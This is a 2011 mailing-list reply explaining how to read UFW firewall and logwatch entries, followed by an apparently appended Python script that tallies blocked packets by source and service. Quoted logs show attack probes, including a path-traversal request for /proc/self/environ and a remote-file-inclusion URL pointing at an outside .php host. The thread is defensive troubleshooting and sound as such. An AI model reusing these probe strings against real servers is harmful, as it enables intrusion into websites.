- To: linux-admin <linux-admin@xxxxxxxxxxxxxxx>
- Subject: Re: UFW logging
- From: terry white <twhite@xxxxxxxxxx>
- Date: Tue, 20 Dec 2011 10:30:31 -0800 (PST)
- In-reply-to: <LB95C01C20EFD4ab49E771871DAC54AB0.1324389799.earth.sciencephoto.co.uk@MHS>
... ciao:
: on "12-20-2011" "Dermot Paikkos" writ:
: I have thousands of entries in my logwatch reports:
this from an hourly "Active System Attack Alerts" report.
"Dec 17 20:14:47 aniota kernel: Packet log: input REJECT ppp0 PROTO=6
218.53.151.177:6000 63.225.163.145:1433 L=40 S=0x00 I=256 F=0x0000
T=106 SYN (#8)
as a general rule, the size of these reports tends to suggest how active
system breach attempts are. typically, 10K was seen as notable; lately,
i'm seeing 40-80K per hour. 'twould seem the natives are restless.
: A total of 5711 sites probed the server
: 1.152.198.116
: 1.22.185.5
: 1.23.105.130
: 1.38.24.232
: 1.38.25.24
: 1.39.95.219
: 1.53.101.185
: 101.108.239.43
:
: I'm not sure what the above probes are.
that, if complete, tells you where the probes initiated. i have a vt
running "lynx" pointed at arin to do arin, ripe, lookups. for instance:
re: 1.152.198.116
"Network
NetRange 1.0.0.0 - 1.255.255.255
CIDR 1.0.0.0/8
Name APNIC-1
Handle NET-1-0-0-0-1
Parent
Net Type Allocated to APNIC" from 'arin';
"inetnum: 1.128.0.0 - 1.159.255.255
netname: TELSTRAINTERNET49-AU
descr: Telstra
descr: Level 12, 242 Exhibition St
descr: Melbourne
descr: VIC 3000
country: AU" from "apnic".
: I also have several entries like this:
: A total of 4 possible successful probes were detected (the following
: URLs contain strings that match one or more of a listing of strings that
: indicate a possible exploit):
:
: /images/?option=com_sectionex&controller=../../../../../../../../../../.
: ./../..//proc/self/environ%0000 HTTP Response 200
: I believe these are php exploits.
the "HTTP Response 200", on the surface of it, is troublesome.
HOWEVER, the http (apache) logs are a more telling indicator of what served
up.
"217.26.127.140 - - [20/Dec/2011:01:43:57 -0800] "GET
//wp-content/plugins/rekt-slideshow/picsize.php?
src=http://blogger.com.1mmt.ru/flash/a.gif.php
HTTP/1.1" 404 356"
here the 404 after "HTTP/1.1" means the request was not satisfied.
error codes are your friend.
: To help secure the server, I installed UFW, enabled and allowed HTTP,
: HTTPS and SSH. I then monitored the logs to see what was happening. What
: I am not clear on is what service the log entries below refer to.
:
: Dec 20 13:10:35 myserver kernel: [4808284.769172] [UFW BLOCK]
: IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00
: SRC=194.27.44.2 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=109
: ID=10243 DF PROTO=TCP SPT=6565 DPT=80 WINDOW=4320 RES=0x00 ACK FIN
: URGP=0
"PROTO=TCP SPT=6565 DPT=80"
'DPT=80' is the "destination port", YOU.
from "/etc/services"
"# service-name port/protocol [aliases ...] [# comment]
http 80/tcp www www-http # WorldWideWeb HTTP
http 80/udp www www-http # HTTP"
so, here we are seeing 'http' processed; however, i am not convinced it is
being blocked at all. from your supplied rules, it looks like http is wide open
...
: Chain ufw-user-input (1 references)
: pkts bytes target
: 29164 1620981 ACCEPT tcp dpt:80 /* 'dapp_Apache' */
--
... it's not what you see ,
but in stead , notice ...
--
To unsubscribe from this list: send the line "unsubscribe linux-admin" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
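The two steps terry walks through above (pull SRC/DPT/PROTO out of a "[UFW BLOCK]" kernel line, then look the port up in /etc/services) are mechanical enough to script. The following is an added example, not code from this thread or from ufw; the log lines and the /etc/services excerpt are constructed inline (the first log line mirrors the one in the question, the other addresses are made up) so it runs offline, and the helper names are mine.

```python
import re
from collections import Counter

# Constructed /etc/services excerpt: same layout as the real file, entries trimmed.
SERVICES_TEXT = """\
# service-name  port/protocol  [aliases ...]   [# comment]
ssh             22/tcp                          # SSH Remote Login Protocol
http            80/tcp          www www-http    # WorldWideWeb HTTP
http            80/udp          www www-http    # HTTP
https           443/tcp                         # http protocol over TLS/SSL
ms-sql-s        1433/tcp                        # Microsoft-SQL-Server
"""

# Constructed sample log lines in the netfilter format ufw writes.  Line 1 is the
# entry from the question; the others are made-up probes plus one non-ufw line.
SAMPLE_LOG = """\
Dec 20 13:10:35 myserver kernel: [4808284.769172] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=194.27.44.2 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=109 ID=10243 DF PROTO=TCP SPT=6565 DPT=80 WINDOW=4320 RES=0x00 ACK FIN URGP=0
Dec 20 13:11:02 myserver kernel: [4808311.120001] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=198.51.100.7 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=106 ID=256 PROTO=TCP SPT=6000 DPT=1433 WINDOW=16384 RES=0x00 SYN URGP=0
Dec 20 13:11:40 myserver kernel: [4808349.550100] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=198.51.100.7 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=106 ID=257 PROTO=TCP SPT=6000 DPT=22 WINDOW=16384 RES=0x00 SYN URGP=0
Dec 20 13:12:15 myserver sshd[2231]: Accepted publickey for admin from 203.0.113.5 port 50122 ssh2
"""

UFW_RE = re.compile(r"\[UFW (?P<action>[A-Z ]+?)\] (?P<rest>.*)$")
KV_RE = re.compile(r"^(\w+)=(\S*)$")


def parse_services(text):
    """Map (port, proto) -> service name; the lookup terry did by hand in /etc/services."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments, including the header line
        if not line:
            continue
        fields = line.split()
        port, proto = fields[1].split("/")
        table[(int(port), proto.lower())] = fields[0]
    return table


def parse_ufw_line(line):
    """Return KEY=VALUE fields plus bare flags (DF, SYN, ACK, FIN ...) of one [UFW ...] line, else None."""
    m = UFW_RE.search(line)
    if not m:
        return None
    entry = {"ACTION": m.group("action"), "FLAGS": []}
    for token in m.group("rest").split():
        kv = KV_RE.match(token)                  # "OUT=" with an empty value still matches
        if kv:
            entry[kv.group(1)] = kv.group(2)
        else:
            entry["FLAGS"].append(token)
    return entry


def service_name(entry, services):
    """Resolve DPT/PROTO of a parsed entry to its /etc/services name, or 'unknown'."""
    try:
        return services[(int(entry["DPT"]), entry["PROTO"].lower())]
    except (KeyError, ValueError):
        return "unknown"


def summarize(log_text, services):
    """Tally blocked packets per source and per (port, service), like the logwatch counts."""
    by_source, by_service = Counter(), Counter()
    for line in log_text.splitlines():
        entry = parse_ufw_line(line)
        if entry is None or entry["ACTION"] != "BLOCK":
            continue
        by_source[entry["SRC"]] += 1
        by_service[(entry["DPT"], service_name(entry, services))] += 1
    return by_source, by_service


if __name__ == "__main__":
    svc = parse_services(SERVICES_TEXT)
    first = parse_ufw_line(SAMPLE_LOG.splitlines()[0])
    print(first["SRC"], "->", "DPT=" + first["DPT"], service_name(first, svc), first["FLAGS"])
    by_source, by_service = summarize(SAMPLE_LOG, svc)
    print("sources:", by_source.most_common())
    print("services:", by_service.most_common())
```

For the question's own line the script resolves DPT=80/TCP to http, and the FLAGS list comes back as DF, ACK, FIN: a FIN/ACK with no SYN, so that particular blocked packet was the tail of a TCP conversation rather than a fresh connection attempt to the web server. The per-service tally is the quick way to see whether the blocked traffic is aimed at services the ufw-user-input chain already ACCEPTs or at ports nothing should be listening on.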